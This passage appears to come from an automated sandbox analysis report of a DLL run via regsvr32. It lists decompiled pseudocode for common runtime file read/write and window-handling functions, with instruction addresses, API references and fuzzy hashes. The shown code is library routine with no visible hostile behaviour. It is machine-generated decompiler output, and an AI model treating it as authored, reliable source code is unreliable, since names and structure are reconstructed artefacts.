				_t127 = (_t79 & 0x0000001f) + (_t79 & 0x0000001f) * 8 << 2;
				_t82 =  *_t125 + _t127;
				_t117 =  *((intOrPtr*)(_t82 + 4));
				if((_t117 & 0x00000002) != 0) {
					goto L42;
				}
				if((_t117 & 0x00000048) != 0 &&  *((char*)(_t82 + 5)) != 0xa) {
					_a12 = _a12 - 1;
					 *_t113 =  *((intOrPtr*)( *_t125 + _t127 + 5));
					_t124 = _t113 + 1;
					_v12 = 1;
					 *((char*)( *_t125 + _t127 + 5)) = 0xa;
				}
				if(ReadFile( *( *_t125 + _t127), _t124, _a12,  &_v16, 0) != 0) {
					_t86 = _v16;
					_t118 =  *_t125;
					_v12 = _v12 + _t86;
					__eflags =  *(_t118 + _t127 + 4) & 0x00000080;
					if(( *(_t118 + _t127 + 4) & 0x00000080) == 0) {
						L41:
						return _v12;
					}
					__eflags = _t86;
					if(_t86 == 0) {
						L15:
						_t89 =  *_t125 + _t127 + 4;
						 *_t89 =  *_t89 & 0x000000fb;
						__eflags =  *_t89;
						L16:
						_t90 = _a8;
						_t120 = _v12 + _t90;
						__eflags = _t90 - _t120;
						_a12 = _t90;
						_v12 = _t120;
						if(_t90 >= _t120) {
							L40:
							_t114 = _t113 - _a8;
							__eflags = _t114;
							_v12 = _t114;
							goto L41;
						} else {
							goto L17;
						}
						while(1) {
							L17:
							_t92 =  *_a12;
							__eflags = _t92 - 0x1a;
							if(_t92 == 0x1a) {
								break;
							}
							__eflags = _t92 - 0xd;
							if(_t92 == 0xd) {
								__eflags = _a12 - _t120 - 1;
								if(_a12 >= _t120 - 1) {
									_a12 = _a12 + 1;
									_t97 = ReadFile( *( *_t125 + _t127),  &_v5, 1,  &_v16, 0);
									__eflags = _t97;
									if(_t97 != 0) {
										L26:
										__eflags = _v16;
										if(_v16 == 0) {
											L34:
											 *_t113 = 0xd;
											L35:
											_t113 = _t113 + 1;
											__eflags = _t113;
											L36:
											_t120 = _v12;
											__eflags = _a12 - _t120;
											if(_a12 < _t120) {
												continue;
											}
											goto L40;
										}
										_t98 =  *_t125;
										__eflags =  *(_t98 + _t127 + 4) & 0x00000048;
										if(( *(_t98 + _t127 + 4) & 0x00000048) == 0) {
											__eflags = _t113 - _a8;
											if(__eflags != 0) {
												L33:
												E1001968C(__eflags, _a4, 0xffffffff, 1);
												_t130 = _t130 + 0xc;
												__eflags = _v5 - 0xa;
												if(_v5 == 0xa) {
													goto L36;
												}
												goto L34;
											}
											__eflags = _v5 - 0xa;
											if(__eflags != 0) {
												goto L33;
											}
											L32:
											 *_t113 = 0xa;
											goto L35;
										}
										_t100 = _v5;
										__eflags = _t100 - 0xa;
										if(_t100 == 0xa) {
											goto L32;
										}
										 *_t113 = 0xd;
										 *((char*)( *_t125 + _t127 + 5)) = _t100;
										goto L35;
									}
									_t101 = GetLastError();
									__eflags = _t101;
									if(_t101 != 0) {
										goto L34;
									}
									goto L26;
								}
								_t103 = _a12 + 1;
								__eflags =  *_t103 - 0xa;
								if( *_t103 != 0xa) {
									_a12 = _t103;
									goto L34;
								}
								_a12 = _a12 + 2;
								goto L32;
							}
							 *_t113 = _t92;
							_t113 = _t113 + 1;
							_a12 = _a12 + 1;
							goto L36;
						}
						_t93 =  *_t125;
						__eflags =  *(_t93 + _t127 + 4) & 0x00000040;
						if(( *(_t93 + _t127 + 4) & 0x00000040) == 0) {
							_t128 = _t93 + _t127 + 4;
							 *_t128 =  *_t128 | 0x00000002;
							__eflags =  *_t128;
						}
						goto L40;
					}
					__eflags =  *_t113 - 0xa;
					if( *_t113 != 0xa) {
						goto L15;
					}
					 *(_t118 + _t127 + 4) =  *(_t118 + _t127 + 4) | 0x00000004;
					goto L16;
				} else {
					_t106 = GetLastError();
					_t129 = 5;
					if(_t106 != _t129) {
						__eflags = _t106 - 0x6d;
						if(_t106 == 0x6d) {
							goto L42;
						}
						_t107 = E10013707(_t106);
						L10:
						return _t107 | 0xffffffff;
					}
					 *((intOrPtr*)(E100136F5())) = 9;
					_t107 = E100136FE();
					 *_t107 = _t129;
					goto L10;
				}
			}































                                                                                                            0x1001b372
                                                                                                            0x1001b37b
                                                                                                            0x1001b380
                                                                                                            0x1001b382
                                                                                                            0x1001b540
                                                                                                            0x1001b540
                                                                                                            0x00000000
                                                                                                            0x1001b540
                                                                                                            0x1001b388
                                                                                                            0x1001b396
                                                                                                            0x1001b39f
                                                                                                            0x1001b3a2
                                                                                                            0x1001b3a4
                                                                                                            0x1001b3aa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b3b3
                                                                                                            0x1001b3c1
                                                                                                            0x1001b3c4
                                                                                                            0x1001b3c8
                                                                                                            0x1001b3cb
                                                                                                            0x1001b3d2
                                                                                                            0x1001b3d2
                                                                                                            0x1001b3ee
                                                                                                            0x1001b429
                                                                                                            0x1001b42c
                                                                                                            0x1001b42e
                                                                                                            0x1001b431
                                                                                                            0x1001b436
                                                                                                            0x1001b53b
                                                                                                            0x00000000
                                                                                                            0x1001b53b
                                                                                                            0x1001b43c
                                                                                                            0x1001b43e
                                                                                                            0x1001b450
                                                                                                            0x1001b452
                                                                                                            0x1001b456
                                                                                                            0x1001b456
                                                                                                            0x1001b459
                                                                                                            0x1001b459
                                                                                                            0x1001b45f
                                                                                                            0x1001b461
                                                                                                            0x1001b463
                                                                                                            0x1001b466
                                                                                                            0x1001b469
                                                                                                            0x1001b535
                                                                                                            0x1001b535
                                                                                                            0x1001b535
                                                                                                            0x1001b538
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b46f
                                                                                                            0x1001b46f
                                                                                                            0x1001b472
                                                                                                            0x1001b474
                                                                                                            0x1001b476
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b47c
                                                                                                            0x1001b47e
                                                                                                            0x1001b48c
                                                                                                            0x1001b48f
                                                                                                            0x1001b4a5
                                                                                                            0x1001b4b9
                                                                                                            0x1001b4bf
                                                                                                            0x1001b4c1
                                                                                                            0x1001b4cd
                                                                                                            0x1001b4cd
                                                                                                            0x1001b4d1
                                                                                                            0x1001b513
                                                                                                            0x1001b513
                                                                                                            0x1001b516
                                                                                                            0x1001b516
                                                                                                            0x1001b516
                                                                                                            0x1001b517
                                                                                                            0x1001b517
                                                                                                            0x1001b51a
                                                                                                            0x1001b51d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b523
                                                                                                            0x1001b4d3
                                                                                                            0x1001b4d5
                                                                                                            0x1001b4da
                                                                                                            0x1001b4ee
                                                                                                            0x1001b4f1
                                                                                                            0x1001b4fe
                                                                                                            0x1001b505
                                                                                                            0x1001b50a
                                                                                                            0x1001b50d
                                                                                                            0x1001b511
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b511
                                                                                                            0x1001b4f3
                                                                                                            0x1001b4f7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b4f9
                                                                                                            0x1001b4f9
                                                                                                            0x00000000
                                                                                                            0x1001b4f9
                                                                                                            0x1001b4dc
                                                                                                            0x1001b4df
                                                                                                            0x1001b4e1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b4e3
                                                                                                            0x1001b4e8
                                                                                                            0x00000000
                                                                                                            0x1001b4e8
                                                                                                            0x1001b4c3
                                                                                                            0x1001b4c9
                                                                                                            0x1001b4cb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b4cb
                                                                                                            0x1001b494
                                                                                                            0x1001b495
                                                                                                            0x1001b498
                                                                                                            0x1001b4a0
                                                                                                            0x00000000
                                                                                                            0x1001b4a0
                                                                                                            0x1001b49a
                                                                                                            0x00000000
                                                                                                            0x1001b49a
                                                                                                            0x1001b480
                                                                                                            0x1001b482
                                                                                                            0x1001b483
                                                                                                            0x00000000
                                                                                                            0x1001b483
                                                                                                            0x1001b525
                                                                                                            0x1001b527
                                                                                                            0x1001b52c
                                                                                                            0x1001b52e
                                                                                                            0x1001b532
                                                                                                            0x1001b532
                                                                                                            0x1001b532
                                                                                                            0x00000000
                                                                                                            0x1001b52c
                                                                                                            0x1001b440
                                                                                                            0x1001b443
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b44b
                                                                                                            0x00000000
                                                                                                            0x1001b3f0
                                                                                                            0x1001b3f0
                                                                                                            0x1001b3f8
                                                                                                            0x1001b3fb
                                                                                                            0x1001b411
                                                                                                            0x1001b414
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b41b
                                                                                                            0x1001b421
                                                                                                            0x00000000
                                                                                                            0x1001b421
                                                                                                            0x1001b402
                                                                                                            0x1001b408
                                                                                                            0x1001b40d
                                                                                                            0x00000000
                                                                                                            0x1001b40d

                                                                                                            APIs
                                                                                                            • ReadFile.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 1001B3E6
                                                                                                            • GetLastError.KERNEL32(?,?,?), ref: 1001B3F0
                                                                                                            • ReadFile.KERNEL32(?,?,00000001,?,00000000,?,?,?), ref: 1001B4B9
                                                                                                            • GetLastError.KERNEL32(?,?,?), ref: 1001B4C3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastRead
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 1948546556-4125583295
                                                                                                            • Opcode ID: 1586ebca8aaa9a6ea4319f4853b1feeec289fced979c0bdf45d6e5b6f0657abd
                                                                                                            • Instruction ID: 3bbfbaef22ec515d269d62fd47d355a82d48074a4c8ee7a64ff4f0343116150f
                                                                                                            • Opcode Fuzzy Hash: 1586ebca8aaa9a6ea4319f4853b1feeec289fced979c0bdf45d6e5b6f0657abd
                                                                                                            • Instruction Fuzzy Hash: DB61D374A04B89DFDB21CFA8C880B997BF0EF05354F158099E9618F2A2D770DAC1CB11
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100197AB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 145fileCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100197AB(void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t68;
				void** _t73;
				signed int _t74;
				long _t76;
				intOrPtr _t79;
				signed int _t81;
				char* _t86;
				int _t91;
				long _t93;
				intOrPtr* _t100;
				void* _t102;
				signed int _t107;
				char _t110;
				struct _OVERLAPPED* _t112;
				long _t115;
				signed int _t118;
				struct _OVERLAPPED* _t120;
				void* _t121;
				void* _t123;

				_t121 = _t123 - 0x3a0;
				_t68 =  *0x1004c470; // 0xf3933a06
				_t112 = 0;
				 *((intOrPtr*)(_t121 + 0x39c)) = _t68;
				 *(_t121 - 0x78) = 0;
				 *((intOrPtr*)(_t121 - 0x7c)) = 0;
				if( *(_t121 + 0x3b0) != 0) {
					_t100 = 0x1004f920 + ( *(_t121 + 0x3a8) >> 5) * 4;
					_t118 = ( *(_t121 + 0x3a8) & 0x0000001f) + ( *(_t121 + 0x3a8) & 0x0000001f) * 8 << 2;
					__eflags =  *( *_t100 + _t118 + 4) & 0x00000020;
					if(__eflags != 0) {
						E1001B190(_t102, __eflags,  *(_t121 + 0x3a8), 0, 0, 2);
					}
					_t73 =  *_t100 + _t118;
					__eflags = _t73[1] & 0x00000080;
					if((_t73[1] & 0x00000080) == 0) {
						_t74 = WriteFile( *_t73,  *(_t121 + 0x3ac),  *(_t121 + 0x3b0), _t121 - 0x80, _t112);
						__eflags = _t74;
						if(_t74 == 0) {
							 *(_t121 - 0x6c) = GetLastError();
						} else {
							 *(_t121 - 0x6c) = _t112;
							 *(_t121 - 0x78) =  *(_t121 - 0x80);
						}
					} else {
						__eflags =  *(_t121 + 0x3b0) - _t112;
						 *(_t121 - 0x74) =  *(_t121 + 0x3ac);
						 *(_t121 - 0x6c) = _t112;
						if( *(_t121 + 0x3b0) <= _t112) {
							L25:
							_t79 =  *_t100;
							__eflags =  *(_t79 + _t118 + 4) & 0x00000040;
							if(( *(_t79 + _t118 + 4) & 0x00000040) == 0) {
								L28:
								 *((intOrPtr*)(E100136F5())) = 0x1c;
								_t81 = E100136FE();
								 *_t81 = _t112;
								L29:
								_t77 = _t81 | 0xffffffff;
								L31:
								goto L32;
							}
							__eflags =  *( *(_t121 + 0x3ac)) - 0x1a;
							if( *( *(_t121 + 0x3ac)) != 0x1a) {
								goto L28;
							}
							_t77 = 0;
							goto L31;
						} else {
							goto L6;
						}
						do {
							L6:
							_t107 =  *(_t121 - 0x74) -  *(_t121 + 0x3ac);
							__eflags = _t107;
							_t86 = _t121 - 0x68;
							 *(_t121 - 0x70) = _t112;
							do {
								__eflags = _t107 -  *(_t121 + 0x3b0);
								if(_t107 >=  *(_t121 + 0x3b0)) {
									break;
								}
								 *(_t121 - 0x74) =  *(_t121 - 0x74) + 1;
								_t110 =  *( *(_t121 - 0x74));
								_t107 = _t107 + 1;
								__eflags = _t110 - 0xa;
								if(_t110 == 0xa) {
									 *((intOrPtr*)(_t121 - 0x7c)) =  *((intOrPtr*)(_t121 - 0x7c)) + 1;
									 *_t86 = 0xd;
									_t86 = _t86 + 1;
									_t34 = _t121 - 0x70;
									 *_t34 =  &( *(_t121 - 0x70)->Internal);
									__eflags =  *_t34;
								}
								 *_t86 = _t110;
								_t86 = _t86 + 1;
								 *(_t121 - 0x70) =  &( *(_t121 - 0x70)->Internal);
								__eflags =  *(_t121 - 0x70) - 0x400;
							} while ( *(_t121 - 0x70) < 0x400);
							_t115 = _t86 - _t121 - 0x68;
							_t91 = WriteFile( *( *_t100 + _t118), _t121 - 0x68, _t115, _t121 - 0x80, 0);
							__eflags = _t91;
							if(_t91 == 0) {
								 *(_t121 - 0x6c) = GetLastError();
								L16:
								_t112 = 0;
								__eflags = 0;
								L17:
								_t76 =  *(_t121 - 0x78);
								__eflags = _t76 - _t112;
								if(_t76 != _t112) {
									_t77 = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
									__eflags = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
									goto L31;
								}
								__eflags =  *(_t121 - 0x6c) - _t112;
								if( *(_t121 - 0x6c) == _t112) {
									goto L25;
								}
								_t120 = 5;
								__eflags =  *(_t121 - 0x6c) - _t120;
								if( *(_t121 - 0x6c) != _t120) {
									_t81 = E10013707( *(_t121 - 0x6c));
								} else {
									 *((intOrPtr*)(E100136F5())) = 9;
									_t81 = E100136FE();
									 *_t81 = _t120;
								}
								goto L29;
							}
							_t93 =  *(_t121 - 0x80);
							 *(_t121 - 0x78) =  *(_t121 - 0x78) + _t93;
							__eflags = _t93 - _t115;
							if(_t93 < _t115) {
								goto L16;
							}
							_t112 = 0;
							__eflags =  *(_t121 - 0x74) -  *(_t121 + 0x3ac) -  *(_t121 + 0x3b0);
						} while ( *(_t121 - 0x74) -  *(_t121 + 0x3ac) <  *(_t121 + 0x3b0));
					}
					goto L17;
				} else {
					_t77 = 0;
					L32:
					return E100117AE(_t77,  *((intOrPtr*)(_t121 + 0x39c)));
				}
			}






















                                                                                                            0x100197ac
                                                                                                            0x100197b9
                                                                                                            0x100197bf
                                                                                                            0x100197c7
                                                                                                            0x100197cd
                                                                                                            0x100197d0
                                                                                                            0x100197d3
                                                                                                            0x100197f3
                                                                                                            0x100197fc
                                                                                                            0x100197ff
                                                                                                            0x10019804
                                                                                                            0x10019810
                                                                                                            0x10019815
                                                                                                            0x1001981a
                                                                                                            0x1001981c
                                                                                                            0x10019820
                                                                                                            0x10019906
                                                                                                            0x1001990c
                                                                                                            0x1001990e
                                                                                                            0x10019921
                                                                                                            0x10019910
                                                                                                            0x10019913
                                                                                                            0x10019916
                                                                                                            0x10019916
                                                                                                            0x10019826
                                                                                                            0x10019826
                                                                                                            0x10019832
                                                                                                            0x10019835
                                                                                                            0x10019838
                                                                                                            0x10019931
                                                                                                            0x10019931
                                                                                                            0x10019933
                                                                                                            0x10019938
                                                                                                            0x10019949
                                                                                                            0x1001994e
                                                                                                            0x10019954
                                                                                                            0x10019959
                                                                                                            0x1001995b
                                                                                                            0x1001995b
                                                                                                            0x10019963
                                                                                                            0x00000000
                                                                                                            0x10019964
                                                                                                            0x10019940
                                                                                                            0x10019943
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019945
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001983e
                                                                                                            0x1001983e
                                                                                                            0x10019841
                                                                                                            0x10019841
                                                                                                            0x10019847
                                                                                                            0x1001984a
                                                                                                            0x1001984d
                                                                                                            0x1001984d
                                                                                                            0x10019853
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019858
                                                                                                            0x1001985b
                                                                                                            0x1001985d
                                                                                                            0x1001985e
                                                                                                            0x10019861
                                                                                                            0x10019863
                                                                                                            0x10019866
                                                                                                            0x10019869
                                                                                                            0x1001986a
                                                                                                            0x1001986a
                                                                                                            0x1001986a
                                                                                                            0x1001986a
                                                                                                            0x1001986d
                                                                                                            0x1001986f
                                                                                                            0x10019870
                                                                                                            0x10019873
                                                                                                            0x10019873
                                                                                                            0x10019881
                                                                                                            0x10019893
                                                                                                            0x10019899
                                                                                                            0x1001989b
                                                                                                            0x100198c2
                                                                                                            0x100198c5
                                                                                                            0x100198c5
                                                                                                            0x100198c5
                                                                                                            0x100198c7
                                                                                                            0x100198c7
                                                                                                            0x100198ca
                                                                                                            0x100198cc
                                                                                                            0x10019960
                                                                                                            0x10019960
                                                                                                            0x00000000
                                                                                                            0x10019960
                                                                                                            0x100198d2
                                                                                                            0x100198d5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100198d9
                                                                                                            0x100198da
                                                                                                            0x100198dd
                                                                                                            0x10019929
                                                                                                            0x100198df
                                                                                                            0x100198e4
                                                                                                            0x100198ea
                                                                                                            0x100198ef
                                                                                                            0x100198ef
                                                                                                            0x00000000
                                                                                                            0x100198dd
                                                                                                            0x1001989d
                                                                                                            0x100198a0
                                                                                                            0x100198a3
                                                                                                            0x100198a5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100198b0
                                                                                                            0x100198b2
                                                                                                            0x100198b2
                                                                                                            0x100198ba
                                                                                                            0x00000000
                                                                                                            0x100197d5
                                                                                                            0x100197d5
                                                                                                            0x10019965
                                                                                                            0x10019978
                                                                                                            0x10019978

                                                                                                            APIs
                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,1004C878,00000001), ref: 10019893
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 3934441357-4125583295
                                                                                                            • Opcode ID: 965eb31f54da86365c2da1447df739003087db675420f9f90e2f522ac335ea6e
                                                                                                            • Instruction ID: bcb25415e8510b231303bc6364b9eff1bf1e0548ad7273a78b3d91e774eab1a2
                                                                                                            • Opcode Fuzzy Hash: 965eb31f54da86365c2da1447df739003087db675420f9f90e2f522ac335ea6e
                                                                                                            • Instruction Fuzzy Hash: AD513671900298DFDB22CFA9C880ADDBBF8FF46744F21411AE9599F256DB309A81CF11
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10022233 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10022233(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				long _t34;
				long _t43;
				struct HWND__* _t48;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E1001F7AE();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x1c)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x1c)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x20)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x44));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x44)) = 0;
				}
				_t64 =  *(_t72 + 0x48);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x48) =  *(_t72 + 0x48) & 0x00000000;
				if(( *(_t72 + 0x38) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E100373DB() + 0x3c));
					if(_t71 != 0 &&  *(_t71 + 0x1c) != 0) {
						E10011C50( &_v52, 0, 0x30);
						_t48 =  *(_t72 + 0x1c);
						_v44 = _t48;
						_v40 = _t48;
						_v52 = 0x28;
						_v48 = 1;
						SendMessageA( *(_t71 + 0x1c), 0x405, 0,  &_v52);
					}
				}
				_t34 = GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc);
				E1002204B(_t72);
				if(GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc) == _t34) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x1c), 0xfffffffc, _t43);
					}
				}
				E10022168(_t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}















                                                                                                            0x1002223c
                                                                                                            0x10022243
                                                                                                            0x10022249
                                                                                                            0x1002224e
                                                                                                            0x10022273
                                                                                                            0x10022273
                                                                                                            0x10022279
                                                                                                            0x1002227b
                                                                                                            0x1002227b
                                                                                                            0x10022279
                                                                                                            0x1002227e
                                                                                                            0x10022283
                                                                                                            0x10022287
                                                                                                            0x1002228a
                                                                                                            0x1002228a
                                                                                                            0x1002228d
                                                                                                            0x10022295
                                                                                                            0x1002229a
                                                                                                            0x1002229a
                                                                                                            0x1002229d
                                                                                                            0x100222a4
                                                                                                            0x100222ab
                                                                                                            0x100222b0
                                                                                                            0x100222c0
                                                                                                            0x100222c5
                                                                                                            0x100222cb
                                                                                                            0x100222ce
                                                                                                            0x100222df
                                                                                                            0x100222e6
                                                                                                            0x100222e9
                                                                                                            0x100222e9
                                                                                                            0x100222b0
                                                                                                            0x100222fb
                                                                                                            0x10022301
                                                                                                            0x10022310
                                                                                                            0x1002231c
                                                                                                            0x10022320
                                                                                                            0x10022328
                                                                                                            0x10022328
                                                                                                            0x10022320
                                                                                                            0x10022330
                                                                                                            0x10022343

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LongWindow$MessageSend
                                                                                                            • String ID: (
                                                                                                            • API String ID: 2178440468-3887548279
                                                                                                            • Opcode ID: a0256d8b5034a2fee01dc273fb99e3b5b93d09b5292866429bde14ed636a8408
                                                                                                            • Instruction ID: 74d92888995a03eb436cf4db0a6f1431d092ba1e50ceac8416b65ae125f9645e
                                                                                                            • Opcode Fuzzy Hash: a0256d8b5034a2fee01dc273fb99e3b5b93d09b5292866429bde14ed636a8408
                                                                                                            • Instruction Fuzzy Hash: 0C31AD34600615FFCB21DFA9E884A6EB7F8FF04250F52062DE5429B692CB31F848CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10032286 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10032286(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
				void* __ebp;
				void* _t29;
				int _t30;
				void* _t35;
				void* _t38;
				intOrPtr* _t40;
				int _t42;
				intOrPtr* _t45;
				void* _t46;

				_t45 = __ecx;
				_t29 = E10022AD5(__ecx);
				_t40 =  *((intOrPtr*)(_t45 + 0x7c));
				_t42 = _a4;
				_t38 = _t29;
				if(_t40 == 0) {
					L2:
					if(_a8 != 0xffff) {
						if(_t42 == 0 || (_a8 & 0x00000810) != 0) {
							 *(_t45 + 0xa4) =  *(_t45 + 0xa4) & 0x00000000;
							goto L17;
						} else {
							if(_t42 < 0xf000 || _t42 >= 0xf1f0) {
								if(_t42 < 0xff00) {
									goto L13;
								}
								 *(_t45 + 0xa4) = 0xef1f;
								goto L17;
							} else {
								_t42 = (_t42 + 0xffff1000 >> 4) + 0xef00;
								L13:
								 *(_t45 + 0xa4) = _t42;
								L17:
								 *(_t38 + 0x38) =  *(_t38 + 0x38) | 0x00000040;
								L18:
								_t30 =  *(_t45 + 0xa4);
								if(_t30 ==  *((intOrPtr*)(_t45 + 0xa8))) {
									L21:
									return _t30;
								}
								_t30 = E100220EE(_t46, GetParent( *(_t45 + 0x1c)));
								if(_t30 == 0) {
									goto L21;
								}
								return PostMessageA( *(_t45 + 0x1c), 0x36a, 0, 0);
							}
						}
					}
					 *(_t45 + 0x38) =  *(_t45 + 0x38) & 0xffffffbf;
					if( *((intOrPtr*)(_t38 + 0x64)) != 0) {
						 *(_t45 + 0xa4) = 0xe002;
					} else {
						 *(_t45 + 0xa4) = 0xe001;
					}
					SendMessageA( *(_t45 + 0x1c), 0x362,  *(_t45 + 0xa4), 0);
					_t35 =  *((intOrPtr*)( *_t45 + 0x150))();
					if(_t35 != 0) {
						UpdateWindow( *(_t35 + 0x1c));
					}
					goto L18;
				}
				_t30 =  *((intOrPtr*)( *_t40 + 0x7c))(_t42, _a8, _a12);
				if(_t30 != 0) {
					goto L21;
				}
				goto L2;
			}












                                                                                                            0x1003228c
                                                                                                            0x1003228e
                                                                                                            0x10032293
                                                                                                            0x10032298
                                                                                                            0x1003229b
                                                                                                            0x1003229d
                                                                                                            0x100322b3
                                                                                                            0x100322ba
                                                                                                            0x1003230d
                                                                                                            0x10032352
                                                                                                            0x00000000
                                                                                                            0x10032317
                                                                                                            0x1003231d
                                                                                                            0x10032344
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10032346
                                                                                                            0x00000000
                                                                                                            0x10032327
                                                                                                            0x10032330
                                                                                                            0x10032336
                                                                                                            0x10032336
                                                                                                            0x10032359
                                                                                                            0x10032359
                                                                                                            0x1003235d
                                                                                                            0x1003235d
                                                                                                            0x10032369
                                                                                                            0x10032394
                                                                                                            0x10032394
                                                                                                            0x10032394
                                                                                                            0x10032375
                                                                                                            0x1003237c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1003238a
                                                                                                            0x1003231d
                                                                                                            0x1003230d
                                                                                                            0x100322bc
                                                                                                            0x100322c4
                                                                                                            0x100322d2
                                                                                                            0x100322c6
                                                                                                            0x100322c6
                                                                                                            0x100322c6
                                                                                                            0x100322ec
                                                                                                            0x100322f6
                                                                                                            0x100322fe
                                                                                                            0x10032303
                                                                                                            0x10032303
                                                                                                            0x00000000
                                                                                                            0x100322fe
                                                                                                            0x100322a8
                                                                                                            0x100322ad
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Strings
